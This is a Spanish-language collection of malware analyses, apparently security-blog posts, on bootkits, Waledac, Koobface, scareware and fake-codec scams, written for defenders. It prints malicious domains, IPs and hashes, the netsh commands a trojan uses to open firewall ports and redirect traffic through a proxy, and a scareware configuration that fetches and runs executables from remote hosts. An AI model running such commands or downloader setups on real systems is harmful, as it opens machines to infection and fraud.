Cabe destacar que en esta compañía se han alojado códigos maliciosos tipo scareware como iMunizator , MacSweeper (ambos diseñados para explotar MacOS), Antivirus Best , Total Security , AV Protect y Virus Doctor , entre tantos otros.

En cuanto al Número de Sistema Autónomo ( Autonomous Systems Number - ASN ) se trata del 32613 ( AS32613 ).

170

Incluso, según el servicio FastFlux Tracker de dnsbl.abuse.ch, este ASN se encuentra asociado a actividades relacionadas con botnets que hacen uso de técnicas Fast-Flux.

En base a este poco volumen de información, se puede deducir fácilmente que cuando de hacer dinero a través de mecanismos fraudulentos se refiere, entran en juego diferentes actores y técnicas que interactúan entre sí para obtener un mayor rédito económico, intentar que la amenaza propagada llegue a la mayor cantidad de usuarios posible y, al mismo tiempo, el rastreo del origen de la diseminación se transforme en una tarea engorrosa.

La peligrosidad de una nueva generación de bootkits Si bien tanto los rootkits como los bootkit forman parte de un mismo concepto y los objetivos finales terminan siendo siempre los mismos, existe una serie de patrones que los diferencian y hacen del bootkit la inevitable evolución del rootkit convencional sumando al estado del arte acciones más complejas.

Por definición, un rootkit esta diseñado para esconder ciertas actividades que un atacante puede realizar en un sistema vulnerado, siendo precisamente esta característica la aprovechada por los desarrolladores de malware para ocultar las actividades del mismo (manipulación de claves del registro, procesos, archivos, etc.) al momento de infectar un sistema. Es decir, el objetivo principal de un rootkit es evitar que las actividades de un atacante sean descubiertas.

Esta situación representa un grave y potencial peligro para la seguridad de cualquier sistema informático ya que, dependiendo del tipo de rootkit, pueden pasar inadvertidos tranquilamente, ya que generalmente poseen la capacidad de correr a bajo nivel (a nivel del kernel).

Por eso las compañías antivirus suelen catalogarlo como peligrosos o extremadamente peligrosos, incluso, quizás sea esta una de las respuestas sobre los esfuerzos de securizar el núcleo de los sistemas operativos.

En relación a esto, a principios de año (2009) fuimos testigos de la aparición de un tipo de rootkit que infecta la MBR (Master Boot Record) de los equipos pero que a diferencia de los rootkits convencionales de este estilo, esta nueva variante es mucho más nocivo y agresivo. Su nombre es Stoned Bootkit (basado en el famoso virus Stoned), fue desarrollado por Peter Kleissner y presentado en BlackHat 2009.

Al activarse desde la MBR, el bootkit se asegura la infección del equipo antes del arranque del sistema operativo, pudiendo ejecutarse desde cualquier dispositivo de almacenamiento (USB, CD, DVD, etc.). Esto significa que no se verán rastros en los sistemas operativos (procesos en memoria por ejemplo) ya que el bootkit no realiza modificaciones directas sobre este.

A pesar de ser considerada una herramienta que permite administrar un sistema (al igual que el rootkit) tal cual su nombre lo indica (conjunto de herramientas del sector de arranque) puede, sin lugar a dudas, ser utilizada con fines maliciosos, y teniendo en cuenta que Stoned Bootkit esta diseñado para funcionar también en Windows 7, independientemente de su arquitectura (32-bits o 64-bits), puede representar el código malicioso más explotado durante el 2010.

171

Bootkit multiplataforma al ataque. ¿La resurrección de los virus de arranque? Como muchos sabrán, en el mundo de los códigos maliciosos existe una extensa nomenclatura para referirse a cada uno de los programas dañinos que se encuentran dando vueltas por la gran red, adoptado en función de las instrucciones y objetivo para el cual fue diseñado, siendo el inglés el idioma más aceptado. Incluso, algunas traducciones directas quedan feas ;P

En relación a esto, quizás hayan leído sobre un nuevo nombre que viene haciendo bastante ruido a partir de la última BlackHat: Bootkit . Pero… ¿de qué se trata?

Un Bootkit es básicamente un tipo de rootkit diseñado para infectar el sector de arranque de los sistemas operativos Windows, conocido habitualmente como la Master Boot Records (MBR).

Si bien el concepto de rootkit se remonta casi a la misma existencia de las plataformas UNIX y los códigos maliciosos que abusan de esta característica tampoco son novedosos, podríamos decir que el concepto de Bootkit hace referencia a una nueva familia de malware desarrollados para evadir cualquier sistema de detección de amenazas alojando sus instrucciones dañinas en el sector de arranque.

De hecho son varios los nombres que han hecho ruido a lo largo de la historia:

• Stoned en 1987 (fue tomado como base para el desarrollo de Michelangelo ) que mostraba en pantalla diferentes mensajes. • BootRoot presentado por primera vez en el 2005 durante la BlackHat y diseñado para funcionar en Windows XP. • Kon-Bot que hace un baypass sobre el esquema de autenticación de Windows, saltándo así el proceso de autenticación. • Vbootkit durante el 2007, que funciona sobre Windows Vista y su segunda versión aparecida durante este año, diseñada para explotar en Windows 7 (incluido 64-bits). Ambas versiones presentadas en el BlackHat. • MebRoot , cuya primera variante apareció durante el año 2007, esta diseñado para robar datos de índole bancaria y del cual vemos una captura presentada en el paper “Your Computer is Now Stoned (...Again!). The Rise of MBR Rootkits” desarrollado conjuntamente entre Symantec y F- Secure donde se muestra su evolución.

• Stoned Bootkit , también presentado en la BlackHat de este año. Es multiplataforma.

En el caso de las dos versiones de Vbootkit, éstas son consideradas pruebas de concepto ( PoC ), sin embargo, como toda prueba de concepto, se termina disparando en una nueva modalidad de ataque a través de malware y la segunda versión (prepara para Windows 7) puede ser una seria amenaza para el próximo año.

172

Ahora… dónde está el punto más relevante de todo esto. Yo creo que Mebroot ha marcado el punto de inflexión sumando al ámbito ilícito una nueva metodología acompañado de un concepto que posee relación directa con los delitos informáticos en cuanto a ataques a través de malware que buscan, no sólo obtener información que puede ser aprovechada incluso para hacer inteligencia o espionaje sino también para alimentar la economía de sus desarrolladores, y que continúa con Vbootkit v2 ya preparada para explotar Windows 7.

Bajo este escenario, la cosa viene pesada, ya que queda en completa evidencia la profesionalización de los cada vez más desarrolladores de malware.

En el caso de Stoned Bootkit , también se encuentra diseñado para saltar los esquemas de seguridad que ofrecen productos como TruCrypt al cifrar el volumen completo de una unidad, provocando un ataque directo contra TrueCrypt. Es decir, posee la capacidad de infectar un equipo incluso cuando está cifrado, ganando acceso a todo el sistema sin importar los recaudos de seguridad en torno a las credenciales con permisos administrativos.

Irónicamente, su autor utiliza una leyenda similar a la que mostraba el viejo Stoned ( Your PC is now Stoned! ), mostrándola en pantalla cada vez que arranca el sistema:

Your PC is now Stoned! ...again

Además y a diferencia de otros rootkits que infectan el sector de arranque de un sistema operativo específico, el nuevo Stoned posee la capacidad de infectar todas las versiones desde Windows XP hasta el tan esperado Windows 7.

Teniendo en cuenta esto, quizás se transforme en un módulo esencial para los desarrolladores de malware que busquen romper las barreras de seguridad de Windows 7.

A pesar de no existir un volumen importante de códigos maliciosos con estas características (Bootkits) cada vez que aparece uno hace ruido en el ambiente. ¿Hablamos de resurrección? Yo creo que no. Sobre todo después de probar algo que no creía posible en la actualidad: el Stoned de 1897, aún hoy explota en Windows Vista.

Waledac/Storm. Pasado y presente de una amenaza latente A principios del 2007 saltaba de la oscuridad un código malicioso que comenzaría a ser motivo de importantes noticias debido a su particulares estrategias de engaño y por una importante campaña de infección a nivel global que aún hoy siguen siendo motivo de investigación por parte de la comunidad de seguridad.

Se trata de Storm , también conocido como Nuwar o Zhelatin dependiendo de la identidad asignada por las compañías antivirus, aunque es más conocido como “tormenta”, quizás en alusión a la forma en que arrasaba los sistemas por los cuales pasaba transformándolos en zombis, reclutando los equipos bajo el mando de su botnet .

En la actualidad, la amenaza que representó Storm no ha quedado a un costado, sino que traspasó sus características al hermano gemelo, Waledac , que mantiene como esencia la característica de intentar innovar en cuanto a las excusas que propone para su propagación, y que recientemente se ha despertado luego de un periodo de hibernación.

Algunas características de esta amenaza son:

• La propagación se realiza a través del correo electrónico no deseado (spam) • Utiliza estrategias de engaño ( Ingeniería Social ) diferentes en cada campaña de propagación • A través de un enlace incrustado en el cuerpo del mensaje direccionan a una página desde donde se descarga el malware • Los equipos infectados forman parte de una botnet 173

• Completan su ciclo de infección a través de la diseminación de spam • Utilizan redes Fast-Flux • Poseen capacidades polimórfica a nivel del servidor

Durante prácticamente todo el 2007, Storm (cuyas primeras apariciones utilizaban como estrategia de engaño la visualización de un video sobre una tormenta desatada en Europa) utilizó como medio de propagación/infección el correo electrónico con asuntos y temáticas muy variadas que incitaban a hacer clic sobre un enlace incrustado en el cuerpo del mensaje que, en algunos casos direccionaba hacia una página (algunas de ellas, además de propagar Storm intentaban explotar vulnerabilidades utilizando etiquetas iframe como recursos), y en otros direccionaba a la descarga directa de un binario, Storm en ambos casos.

Ver anexo IV

Ya para el próximo año (2008), Storm incorporó el “efecto sorpresa” vinculando el enlace del correo electrónico siempre a un sitio web que acompañaba la excusa expuesta en el asunto del correo junto a una imagen alusiva, también a la temática que, al igual que en el 2007, rotaba con cada suceso importante (día de San Valentín, Independencia de EEUU, navidad, etc). Además, algunas variantes se propagaron a través de blogs.

Ver anexo IV

Luego de varios meses de inactividad en cuanto a la propagación de la amenaza, durante enero de este año aparece Waledac, un troyano que utiliza los mismos mecanismos empleados por Storm y más de un profesional de seguridad comienza ver las similitudes entre ellos.

Luego de varias investigaciones, se afirma que Waledac es el, se podría decir, el hermano gemelo de Storm. Utilizando las mismas metodologías de Ingeniería Social con una amplia cartera de imágenes y temáticas que utiliza como excusa para captar la atención de los usuarios. 174

Pasando por las típicas imágenes un tanto "amorosas" durante el mes de San Valentín, asuntos sobre supuestos atentados terroristas, entre otros, hasta llegar a la reciente sobre un supuesto video en YouTube.

Ver anexo IV Existen, entre otras, dos características sumamente interesantes tanto en Waledac como en Storm: la utilización de redes Fast-Flux y capacidades polimórficas en el servidor.

La primera de ellas permite que las amenazas se propaguen a través de diferentes direcciones IP y utilizando diferentes nombres de dominio que van rotando constantemente entre sí intercambiando la resolución de nombres. Esto provoca que, a través de un determinado tiempo de vida (TTL) previamente configurado cada x cantidad de saltos entre nodos (equipos infectados), desde un mismo dominio, se descargue un prototipo diferente del malware.

Lo que da lugar a la segunda característica, el polimorfismo. De esta manera, cada vez que el paquete (malware) alcanza el TTL establecido se intenta descargar una versión diferente del código malicioso que se "modifica" cada cierta cantidad de tiempo (también previamente establecido por el atacante) estableciendo la capacidad polimórfica.

En el siguiente diagrama se establece la relación directa que, a lo largo del tiempo, la amenaza fue utilizando en cuanto a las estrategias de engaño.

Ver anexo IV

Cada uno de las zombis que forman parte de la botnet creada por Waledac, focalizan sus intenciones en el envío de spam. En este sentido, un dato muy interesante extraído de un informe, afirma que Waledac posee la capacidad de enviar aproximadamente 150.000 correos spam por día.

Quizás, luego de saber que Storm/Waledac se encuentra ejecutando campañas de propagación con altos índices de infección y masificadas a escala mundial, es evidente que sus creadores continúan con sus maniobras delictivas por una cuestión financiera, lo cual no es ninguna novedad para el malware de nuestros días.

175

Campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU Luego de un largo tiempo de in actividad, el creador (o creadores) del troyano Waledac , vuelven a ejecutar, hoy 4 de Julio (Día de la Independencia estadounidense), una nueva campaña de propagación utilizando el mismo mecanismo que caracteriza a Waledac, y caracterizó a Nuwar en su momento; Ingeniería Social.

En esta oportunidad la excusa es el Día de la Independencia de EEUU que se festeja hoy mismo y el mecanismo de propagación consiste en la simulación de un supuesto video mostrando los juegos artificiales por la celebración del especial día en cuestión.

Es probable que esta masiva campaña de propagación/infección termine con un índice de infección bastante alto debido a que el vector por el cual se está diseminando la amenazas es el correo electrónico que respetando una característica propia del spam, la masividad, legará a millones de usuarios aprovechando el poder computacional de la botnet formada por Waledac.

Por el momento no posee alguna característica relevante que diferencie el mecanismo de diseminación empleado en esta oportunidad con relación a las anteriores, quizás el periodo de actividad quede prolongado por un buen tiempo.

Aún así, las analogías que encontramos son evidentes. Por ejemplo, sigue haciendo uso de técnicas BlackHat SEO en la composición de los nombres de dominios haciendo alusión a la excusa que utiliza ( firework, 4th, independence, happy, july, movies, video ).

Entre los nombres de dominios creados a partir de estas palabras se encuentran (propagando waledac de manera activa): videoindependence .com video4thjuly .com outdoorindependence .com moviesindependence .com movieindependence .com moviesfireworks .com moviefireworks .com movies4thjuly .com movie4thjuly .com interactiveindependence .com holifireworks .com holidaysfirework .com happyindependence .com 4thfirework .com freeindependence .com 4thfirework .com 176

Los nombres de binarios utilizados por Waledac hasta el momento son: install.exe 885ac83376824a152f2422249cf4d7e5 install.exe b5f3d0150fb4b7e30e7a64d788e779e0 install.exe 424a85c096ce6d9cbbe8deb35a042fda movie.exe 74c3b53958527b8469efa6e6d8bccaf9 movie.exe 2740cee619deccad6ed49ff6a23ebd14 movie.exe a45d0405518ad2c294ed1b151e808f55 movie.exe 426e031049675c8136c6739530057ba5 movie.exe 395b1d4a68f435416cbb69cae0c220c7 movie.exe 28de1675b2694927c16d34eacdafbc56 run.exe 30a6e0e3bdb000ce85dc8d754582f107 run.exe b14c93fb2cf91d2a03e20f7165101f5e run.exe 3083b6bc236121e6150f13f3d0560635 fireworks.exe c62c388472695589bd5e0f4989d93ab0 fireworks.exe ae2fc409bd054047f9582fb9f76eb1aa fireworks.exe 1b21e77b08c31bf99e5cc3f6cfd11954 setup.exe 3c067587383d3c26a3b656f25c54ea47 setup.exe f2589d96b7f6838ae322e4c6739efd07 setup.exe 543630de475994ce778fa35ce45984f4 setup.exe 9fa07157ee1e1c1b86a27df816596d13 patch.exe dcde62f021146696100d87b9c741be73 patch.exe 6811725f3cdda17ba5f8877f02a796d4 patch.exe d655566ba4911fc0ff60d197d54dff2c patch.exe 395b1d4a68f435416cbb69cae0c220c7 video.exe 499db7f0870ce5de80193996179445e5 video.exe c1a3ef240be48fb500167aaedb72bdcf video.exe 02ed2300a349a0c20c5b15b06130ba1f

A través del seguimiento que realiza sudosecure.net de esta amenaza desde que nació bajo el nombre de Nuwar, podemos observar esta información de manera gráfica.

Del mismo modo, podemos visualizar de manera gráfica mucha información relevante, como por ejemplo las direcciones IP involucradas en la diseminación de Waledac. En este caso, el Top 10 y, teniendo en cuenta que la campaña esta focalizada en el territorio estadounidense (aunque esto no significa que la cantidad de usuarios infectados se limite a EEUU), es lógico creer que la mayor cantidad de infecciones se darán en primera instancia en este país.

Por otro lado, Waledac sigue implementando como técnica de ocultación técnicas Fast-Flux, utilizando diferentes direcciones IP para un mismo dominio. 177

videoindependence .com 98.211.105.230 > United States 76.106.189.169 > United States 201.213.72.205 > Argentina 201.21.134.78 > Brazil 201.6.212.62 > Brazil 201.212.3.94 > Argentina 69.148.172.231 > United States 99.141.124.192 > United States

video4thjuly .com 72.225.252.27 > United States 71.193.54.175 > United States 84.109.243.13 > Israel 200.108.196.153 > Uruguay 201.241.106.65 > Chile 200.26.178.12 > Paraguay 201.213.101.148 > Argentina 81.97.116.82 > United Kingdom 76.103.252.191 > United States 201.6.229.122 > Brazil 68.56.57.51 > United States 200.112.184.67 > Argentina 67.242.8.170 > United States 82.162.25.19 > Russian Federation 84.253.71.15 > Russian Federation

Waledac ha salido nuevamente de las sombras activando su clásica estrategia de diseminación que seguramente seguirá con su campaña de propagación/infección ampliando su botnet con el reclutamiento de más zombis.

Propagación de Malware a través de sitios con formato de blogging y BlackHat SEO Ya hemos visto y mencionado en algún momento que las estrategias utilizadas durante los procesos de diseminación de códigos maliciosos involucran cada vez más técnicas de BackHat SEO para lograr diferentes vectores de acceso a la descarga del archivo dañino que se busca propagar.

Combinado esto con Ingeniería Social y nombres de dominios con palabras muy demandadas a través de motores de búsqueda que hacen referencia a sitios web con un importante y masivo caudal de uso como Rapidshare, Megaupload y otras relacionadas a música, juegos, películas, etc, hacen en su conjunto, un método de propagación muy efectivo.

Actualmente se esta llevando a cabo una importante campaña propagandista a través de sitios web que simulan toda una estructura de blogging y utilizan palabras muy buscadas y combinadas entre sí para formar el nombre de los dominios llamativos para descargar malware empleando técnicas BlackHat SEO para lograr un buen posicionamiento en los buscadores. Entre las palabras empleadas se encuentran: rapidshare, megaupload, free, games, soft, warez, ftp, music, full, pub, movies, cat, catalog, download .

178

Entre los dominios creados a partir de la combinación de estas palabras se encuentran: freesoftcat .com (78.109.22.131) movie-rapidshare .com music-rapidshare .com warez-catalog .com games-rapidshare .com www.downloads-rapidshare .com www.freesoftcat .com www.movie-megaupload.com www.movie-rapidshare .com www.music-rapidshare .com www.warez-catalog .com

free-full .com (213.155.3.240) moviesrapidshare .org musicrapidshare .org softrapidshare .com softrapidshare .org www.free-full .com www.musicrapidshare .org www.softrapidshare .com

free-full-rapidshare .com (78.109.22.135) www.free-full-rapidshare .com cpmusicpub .com (213.155.3.250) ftp-warez .org soft-rapidshare .net www.ftp-warez .org www.soft-rapidshare .net free-games-rapidshare .com (78.109.22.140) tsautah .org www.free-games-rapidshare .com www.soft-warez .org www.tsautah .org

La búsqueda en motores de palabras o temáticas que forman parte de las páginas poseen un posicionamiento muy eficaz, apareciendo, como en el ejemplo, en los primeros puestos.

179

Desde los diferentes sitios se descarga una batería importante de malware no sólo en cantidad sino también en variedad. Alguno de los archivos dañino son:

• SoftwareAngular.Momentum.-.Chromium.45094.exe - 2/41 (4.88%) • Keygen.OJOsoft.Total.Video.Converter.v2.6.1.0106.-.For.MKV!.exe - 24/40 (60.00%) • Setup.exe - 26/40 (65.00%)

Las técnicas BackHat SEO presentan un nuevo enfoque de propagación de malware que los desarrolladores de malware no dejan a un costado, marcando una tendencia y campaña de infección eficaz y agresiva difícil de controlar a través de mecanismos convencionales.

Simbiosis del malware actual. Koobface Koobface es un gusano diseñado a explotar los perfiles de usuarios de populares redes sociales como MySpace y FaceBook con la finalidad de obtener información sensible y confidencial de sus víctimas; aunque las versiones más recientes limitan su objetivo a FaceBook. De hecho, la palabra Koobface es una transposición de la palabra Facebook.

Sus primeras versiones datan de fines de 2008 y desde ese entonces continúa In-the-Wild con un índice de infección preocupante. Tal es así que la misma compañía dio a conocer una serie de medidas preventivas tendientes a minimizar el potencial riesgo de infección, que constantemente se encuentra latente para los usuarios que hacen uso de la red social.

En principio, el medio de diseminación habitual que utiliza Koobface es vía web a través de Ingeniería Social Visual y constituye la primera faceta de propagación.

La segunda faceta (infección) canaliza sus acciones maliciosas en una característica muy común en la actualidad, que se basa en la conjunción de malware, generando una simbiosis donde cada uno de los componentes del ambiente despliegan instrucciones particulares que buscan un objetivo común y general.

Pero veamos cuáles son esos componentes que forman parte de la etapa de infección de la variante Koobface.NBO. 180

Este gusano, detectado actualmente por aproximadamente 31 compañías antivirus de 41 (75.61%), al infectar el sistema establece conexión con las siguientes URL's:

• http://oberaufseher.net/img/cmd.php • http://pornfat.net/img/cmd.php

También descarga los siguientes códigos maliciosos:

• TrojanDownloader.Small.OCS Troyano • Tinxy.AD Troyano • Tinxy.AF Troyano • BHO.NOE Troyano • Koobface.NBH gusano • PSW.LdPinch.NEL Troyano

Desde el punto de vista técnico, se pueden establecer algunos datos recolectados del breve análisis preliminar de cada uno de los códigos maliciosos descargados por Koobface:

El troyano TrojanDownloader.Small.OCS posee una tasa de detección de 35/40 (87.5%) crea claves en el registro y realiza una copia de sí mismo.

• HKLM\SOFTWARE\Microsoft\MSSMGR\ • HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\winccf32 • C:\WINDOWS\system32\winccf32.dll (copia de sí mismo).

Tinxy.AF, otro troyano, también crea archivos en el sistema y posee una tasa de detección levemente menor al anterior, 30/40 (75.00%).

• C:\windows\ld09.exe • C:\docume~1\user\locals~1\temp\podmena.bat

El troyano Tinxy.AD posee un índice de detección de 35/40, aproximadamente es detectado por el 87.50% de los antivirus. Crea una copia de sí mismo y hace uso de la herramienta NetShell para habilitar una DLL, abrir puertos y especificar un proxy.

• C:\WINDOWS\system32\SYSDLL.exe (copia de sí mismo) • netsh add allowedprogram "SYSDLL" C:\WINDOWS\System32\SYSDLL.exe ENABLE • netsh firewall add portopening TCP 80 SYSDLL ENABLE • netsh firewall add portopening TCP 7171 SYSDLL ENABLE • netsh winhttp set proxy proxy-server="http=localhost:7171" Agrega la información del proxy en:HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "http=localhost:7171" /f

BHO.NOE, es otro de los troyanos que forman parte del proceso de infección de Koobface, con una tasa de detección del 92.11% (35/38), crea una carpeta y un archivo.

• C:\WINDOWS\system32\796525 • C:\WINDOWS\system32\796525\796525.dll 181

En cuanto al troyano PSW.LdPinch.NEL, detectado por 34 antivirus de 40 (85.00%), está diseñado para robar contraseñas de diferentes navegadores web, clientes de correo, clientes de mensajería instantánea y otros servicios.

Por último, descarga una variante de la familia, el gusano Koobface.NBH, en este caso, la tasa de detección es de 27/40 (aprox. 67.50%).

Como podemos apreciar, la infección de este código malicioso no se limita sólo a las instrucciones maliciosas que posee, sino que va más allá y descarga otros. Este accionar constituye un comportamiento común en la actualidad, donde la fusión de aplicativos web de control y administración de botnets y la de diferentes tipos de malware, unen fuerzas con un mismo objetivo: aumentar la economía de los delincuentes informáticos.

Supuesto Códec para crear videos HD utilizado como carnada para scam Si cuando hablamos de malware nombramos a los códec, lo primero que recordamos es la inmensa cantidad de troyanos, scareware y demás código viral que a través de Ingeniería Social visual intenta comprometer los equipos de los internautas.

Sin embargo, la fama que suponen los códecs como herramientas de video hace que la temática maliciosa se extienda a otros planos. Como el presente caso, donde el objetivo es el fraude.

Se trata de un sitio web que promociona una herramienta supuestamente concebida para crear y reproducir video de alta definición a través de la tecnología H.264 (MPEG4 AVC). Expresamente, el mensaje que se dispone en la página es el siguiente:

“We're now introducing the next generation of VSCodecPRO technology with VSCodecPRO ? our new software that lets you create and play full HD H.264 (MKV) videos. H.264 is a new standard that is poised to power the high definition video revolution by offering incredible visual quality, performance and efficiency. VSCodecPRO gives you all the tools you need to take full advantage of H.264 for a truly cinematic video experience.”

Algo así como:

“Estamos presentando la próxima generación de VSCodecPRO con tecnología VSCodecPRO. Nuestro nuevo software le permite crear y reproducir videos HD H.264 (MKV). H.264 es un nuevo estándar que se dispone a alimentar la revolución de video de alta definición, ofreciendo calidad visual increíble, rendimiento y eficiencia. VSCodecPRO le da todas las herramientas que necesita para sacar el máximo provecho de H.264 para una verdadera experiencia de cine en vídeo.”

182

Hasta aquí todo muy lindo y una excelente alternativa para los amantes de los videos en buena calidad o para aquellos profesionales que se dedican a mejorar la calidad de sus trabajos visuales. Claro está, siempre y cuando la propuesta sea verdad. ;-P

La cuestión es que cuando nos proponemos a descargar el “mágico” programa haciendo clic sobre el botón correspondiente, no sucede nada; es decir, no logramos descargar el programa. Pero sí encontramos un enlace con la leyenda “buy it now” que incita a la compra del mismo.

Es en este momento donde comienza a gestarse un fraude, ya que la aplicación fraudulenta posee un costo; ofreciéndose dos alternativas de “compra”: una licencia por 180 días a USD 49.99 , y otra full por USD 79.99 .

Al seleccionar cualquiera de las dos opciones, aparece el formulario solicitando información sensible y financiera del internauta. Una vez concluida la solicitud y luego de enviar la información expuesta, la devolución es un error de procesamiento, donde los reclamos, o mejor dicho, a dónde reclamar, no existe.

183

Al profundizar un poquito más, sale a la luz que la dirección IP (91.212.65.29) del sitio, es compartida con otros dominios como:

antivirus-2009-ppro .com antivirus-pppro .com antivirus-scan-2009 .com antivirus-xppro-2009 .com antivirus-xppro2009 .com onlinescanxppp .com scan-virusremover2009 .com

Todos conocidos por la diseminación del scareware Antivirus XP Pro 2009 .

Este tipo de estrategias delictivas son extremadamente comunes en Internet, siendo muy empleadas por cibercriminales que utilizan aplicativos scareware como excusa para llevar a cabo maniobras fraudulentas similares.

Los delincuentes informáticos no dejan de pensar en ideas que le permitan acrecentar la economía en sus bolsillos, ni de agregar “servicios” y alternativas a la industria del malware.

Scareware. Repositorio de malware In-the-Wild El sentido de repositorio supone la disponibilidad de cualquier tipo de recurso que necesitemos obtener de manera oportuna, siendo precisamente, el concepto de esta última palabra, la visión de los creadores de códigos maliciosos al idear sus estrategias de diseminación.

En la siguiente captura vemos un repositorio de malware que se encuentran muy activos, alojados en un dominio que a simple vista no posee contenido alguno (es decir, si accedemos la página se ve en blanco).

Sin embargo, en alguna parte posee disponible la descarga de los archivos dañinos, que dicho sea de paso, los nombres de cada archivo simulan muy bien no ser peligrosos.

El malware se encuentra alojado en diferentes carpetas ocultas que podremos acceder si conocemos el nombre de cada una de ellas. De esta manera, los ciberdelincuentes diseminan los archivos a través de cualquier canal (e-mail, IM, páginas web) suministrando la ruta completa que descarga el código malicioso, como por ejemplo: updvms .cn/VSWEEPR/SetupReleaseXP .exe.

Cada una de las carpetas ocultas son referencias de diferentes scareware muy conocidos y muy activos actualmente. Las carpetas y los respectivos scareware que representan son: VSWEEPR (Virus Sweeper) , VSHIELD (Virus Shield) , VMLT (Virus Melt) , VALARM (Virus Alarm Pro) , UA2009 (Ultra Antivirus 2009) , PRTUP (Presto TuneUp) , MCATCH (Malware Catch) , FASTAV (Fast Antivirus) , EXAVR (Extra Antivir) .

184

Cada una de estas carpetas contiene los mismos archivos:

/ActivatedRelease.exe 20/39 (51.29%) /ActivatedReleaseXP.exe 24/39 (61.54%) /ActivatedSetup.exe 22/39 (56.42%) /ActivatedSetupRelease.cab 17/39 (43.59%) /ActivatedSetupRelease.exe 18/39 (46.16%) /ActivatedSetupReleaseXP.cab 21/39 (53.85%) /ActivatedSetupReleaseXP.exe 21/39 (53.85%) /Release.exe 19/39 (48.72%) /ReleaseXP.exe 22/39 (56.42%) /SetupPack.exe 25/38 (65.79%) /Setup.exe 14/38 (36.84%) /Rpdm.exe 21/39 (53.85%) /Instructions.ini /SetupRelease.cab 16/38 (42.11%) /SetupRelease.exe 18/39 (46.16%) /SetupReleaseXP.cab 19/39 (48.72%) /SetupReleaseXP.exe 18/39 (46.16%) /Work.exe 20/38 (52.64%) /uninstall.exe 23/39 (58.98%) /update.exe 22/38 (57.9%) /update.exe 27/38 (71.06%)

El archivo " Instructions.ini " posee la siguiente información:

[Common] ==//== URL0=http://vlrm.googlecode .com/svn/trunk/Instructions .ini URL1=http://update1.virusalarmpro .com/Instructions .ini URL2=http://update2.virusalarmpro .com/Instructions .ini ==//== OutPutName=update.exe RunParams=/u RunHideParams=/h ==//== URL0=http://vlrm.googlecode .com/svn/trunk/update .exe URL1=http://update1.virusalarmpro .com/update .exe URL2=http://update2.virusalarmpro .com/update .exe ==//== OutPutName=uninstall.exe ==//== URL0=http://vlrm.googlecode .com/svn/trunk/uninstall .exe URL1=http://update1.virusalarmpro .com/uninstall .exe URL2=http://update2.virusalarmpro .com/uninstall .exe ==//== OutPutName=Work.exe ==//== URL0=http://vlrm.googlecode.com/svn/trunk/Work.exe

Ahora bien, hay una serie de datos muy interesantes como que la mayoría del malware pertenece a una misma familia de scareware (Virus Melt, Virus Alarm, Virus Shield, etc.), buscando en la diseminación/infección, como es habitual en el scareware y a través de diferentes sitios web, realizar un fraude al incitar la compra del falso programa antivirus.

Los diferentes dominios que se encuentran en la misma dirección IP (64.213.140.69) son:

antivirus09 .net malwarecatcher .net prestotuneup .com 185 promo.fastantivirus09 .com scan-ultraantivirus2009 .com update1.virusalarmpro .com update2.prestotuneup .com

En el caso del sitio del scareware Malware Catcher, hay un dato estadístico que me llamó la atención y cuyo objetivo es ofrecer un nivel tolerante de confianza hacia el usuario. Se trata de una comparativa en la que, humildemente, el falso antivirus ocupa el primer lugar :-)

Fomentar este tipo de información en las páginas del scareware forma parte de la estrategia de Ingeniería Social; lo que demuestra la organización y profesionalización que se encuentra detrás del malware.

Otro dato interesante es que al chequear la detección por parte de las compañías antivirus, muchas de ellas identifican alguna de las amenazas como variante de Waledac.

¿El scareware formará parte de una nueva estrategia de diseminación de Waledac?

Como podemos apreciar, el malware se nutre de diferentes alternativas de variada complejidad en cuanto a sus técnicas, incluso, transformando los sistemas infectados en una simbiosis de códigos maliciosos, que obliga a conocer los vectores de ataque más comunes para lograr un nivel de protección eficaz, sin descuidar la protección que ofrece una solución de seguridad antivirus.

Pornografía. Excusa perfecta para la propagación de malware Los sitios que ofrecen contenidos pornográficos suelen tener muchas visitas, quizás, mucho más de las que se imaginan; y no se trata de una nueva tendencia ni de una moda actual. No es coincidencia, ya que el material pornográfico es de los más buscados en Internet, incluso históricamente hablando.

En consecuencia, es lógico pensar que lo “porno” sea utilizado como vector de ataque para infectar los equipos de quienes suelen frecuentarlos; muchos de nosotros, con fines investigativos claro está ;D

Precisamente, esa curiosidad por la investigación me llevó a dar con un sitio que es una muestra de museo para describir la maniobra maliciosa de utilizar Ingeniería Social con un alto componente de engaño para captar la atención de esos internautas que “surfean” por la noche de la nube, en busca de algún deleite a nivel visual ;D

En este caso, bajo el slogan “ Nude Celebrities on Video ” nos encontramos una página que ofrece la visualización de videos sobre celebridades, siendo las personalidades elegidas B ritnet Spears, Rihanna, Charlotte Gainsbourg, Emma Watson, Mischa Barton . 186

Otras personalidades que forma parte de la nñomina son Aisleyne Horgan, Kate Moss, Scarlett Johansson, LIndsay Lohan, Penelope Cruz, Singer Amy Winehouse, Louise Redknapp, Miley Cyrus, Sophie Howard, Emily Procter, Jessica Simpson y la ya clásica Pamela Anderson ;D

Cuando la persona que desea visualizar alguno de los supuestos videos hace clic sobre ellos, se despliega una pequeña ventana advirtiendo sobre la necesidad de instalar un códec, ofreciendo la descarga del mismo.

En este momento, si el usuario acepta, se produce la descarga de un malware, también conocido como pornware por su relación directa con el ámbito pornográfico.

Se trata de un binario llamado softwarefortubeview.40056.exe (MD5:ce845a1e32ecc07ee0d58bc6ea55fe9c) que se descarga desde la dirección http://streaming-united .com (91.212.65.54) alojado en Ucrania, y cuya tasa de detección es muy baja. Sólo lo detectan 6 motores antivirus de un total de 40.

Teniendo en cuenta el vector utilizado para su propagación, más el componente de Ingeniería Social visual y el bajo índice de detección, podemos suponer que el grado de efectividad con el que puede contar la amenaza, es alto. Esto obliga a estar muy atentos cuando, con fines investigativos :-) visitan sitios web con este tipo de contenidos.

187

Masiva propagación de malware a través de falsos sitios de entretenimiento Los casos de propagación de códigos maliciosos a través de diferentes metodologías de engaño constituyen una parte fundamental dentro del ciclo de diseminación que los desarrolladores de malware emplean.

Los recursos que se ofrecen a través de Internet con fines de entretenimiento suelen constituir uno de los blancos más explotados para la diseminación de código nocivo, y a tal efecto he recibido muchas consultas en torno a sitios web con material infantil de entretenimiento que aloja alguna inyección de código dañino o descarga de malware.

